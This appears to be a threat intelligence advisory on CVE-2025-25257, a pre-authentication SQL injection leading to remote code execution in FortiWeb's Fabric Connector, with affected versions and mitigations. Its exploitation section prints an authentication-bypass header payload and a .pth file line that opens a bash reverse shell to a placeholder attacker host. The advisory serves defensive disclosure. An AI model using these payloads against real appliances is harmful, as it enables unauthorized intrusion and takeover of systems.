CVE-2025-25257: Pre-Auth SQL Injection in FortiWeb Fabric Connector Enables Full RCE

A severe pre-authentication SQL injection vulnerability in Fortinet FortiWeb’s Fabric Connector component allow unauthenticated attackers to perform remote code execution (RCE) on vulnerable appliances by exploiting improper input handling in a REST API endpoint. Public proof-of-concept (PoC) exploits have been released, significantly increasing the likelihood of exploitation in the wild.

Severity Level: Critical

Vulnerability Details

• CVE ID: CVE-2025-25257
• CWE: CWE-89 – Improper Neutralization of Special Elements Used in an SQL Command (‘SQL Injection’)
• CVSS Score: 9.0038
• Vulnerable Component: get_fabric_user_by_token() function in FortiWeb’s Fabric Connector
• Attack Vector: Remote / Unauthenticated
• Vulnerability Type: SQL Injection leading to Remote Code Execution (RCE)
• Exposed Endpoint: /api/fabric/device/status

Root Cause

The vulnerability stems from unsafe usage of user-supplied input in SQL queries, specifically the Authorization: Bearer header. The function get_fabric_user_by_token() constructs SQL statements using snprintf() without input sanitization or parameter binding:
snprintf(s, 0x400u, “select id from fabric_user.user_table where token=’%s'”, a1);
This enables attackers to inject arbitrary SQL payloads directly into the database query.

Exploitation Of The Vulnerability

Phase 1: SQL Injection via HTTP Header
Attackers send specially crafted HTTP requests to the /api/fabric/device/status endpoint:

• GET /api/fabric/device/status HTTP/1.1
• Authorization: Bearer AAAAAA’or’1’=’1

This bypasses authentication.

Phase 2: File Write via MySQL INTO OUTFILE
Using MySQL’s INTO OUTFILE, attackers write a malicious .pth file into Python’s site-packages directory. This file includes:

• import os; os.system(‘bash -c “/bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1″‘)

Phase 3: RCE Trigger
The .pth file is executed when Fortinet’s exposed CGI script (/cgi-bin/ml-draw.py) runs, leading to full remote code execution.

Constraints Overcome:

• Character limits in the Authorization header
• SQL parsing limitations via sscanf() (no spaces allowed → workaround via /**/ comments)
• MySQL restrictions on file writing (no overwrite/append → relative path + one-shot payload)

Affected & Fixed Versions

Version	Affected	Solution
FortiWeb 7.6	7.6.0 through 7.6.3	Upgrade to 7.6.4 or above
FortiWeb 7.4	7.4.0 through 7.4.7	Upgrade to 7.4.8 or above
FortiWeb 7.2	7.2.0 through 7.2.10	Upgrade to 7.2.11 or above
FortiWeb 7.0	7.0.0 through 7.0.10	Upgrade to 7.0.11 or above

Recommendations

1. Upgrade FortiWeb to the fixed versions.
2. Workaround: Disable HTTP/HTTPS administrative interface.
3. Alert on HTTP requests to /api/fabric/device/status with suspicious Authorization headers
4. Disable unused Fabric Connector integrations if not essential
5. Remove CGI execution permissions for /cgi-bin/* if not required
6. Audit file permissions of directories such as /migadmin/cgi-bin and Python site-packages.

Source:

• https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/
• https://fortiguard.fortinet.com/psirt/FG-IR-25-151
• https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.